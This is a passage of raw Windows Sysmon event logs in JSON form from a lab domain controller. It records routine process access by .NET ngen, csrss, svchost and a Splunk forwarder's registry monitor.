08:05:44.538","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-224F-5F25-0000-0010BF190D00}","TargetProcessId":"1432","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7552,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.538\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-224F-5F25-0000-0010BF190D00}\r\nTargetProcessId: 1432\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.538","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-224F-5F25-0000-0010BF190D00}","TargetProcessId":"1432","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7553,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.538\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-224F-5F25-0000-0010BF190D00}\r\nTargetProcessId: 1432\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.538","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-224F-5F25-0000-0010BF190D00}","TargetProcessId":"1432","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7554,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.585\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2258-5F25-0000-001067DD0D00}\r\nTargetProcessId: 3408\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.585","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2258-5F25-0000-001067DD0D00}","TargetProcessId":"3408","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7555,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.585\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2258-5F25-0000-001067DD0D00}\r\nTargetProcessId: 3408\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.585","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2258-5F25-0000-001067DD0D00}","TargetProcessId":"3408","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7556,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.601\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2258-5F25-0000-001067DD0D00}\r\nTargetProcessId: 3408\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.601","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2258-5F25-0000-001067DD0D00}","TargetProcessId":"3408","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7557,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.773\r\nProcessGuid: {41C8662E-2258-5F25-0000-0010CDE10D00}\r\nProcessId: 2232\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.773","ProcessGuid":"{41C8662E-2258-5F25-0000-0010CDE10D00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:05:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7558,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.773\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-221C-5F25-0000-001017FB0A00}\r\nTargetProcessId: 2232\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.773","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-221C-5F25-0000-001017FB0A00}","TargetProcessId":"2232","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7559,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.773\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-221C-5F25-0000-001017FB0A00}\r\nTargetProcessId: 2232\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.773","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-221C-5F25-0000-001017FB0A00}","TargetProcessId":"2232","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7560,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.773\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 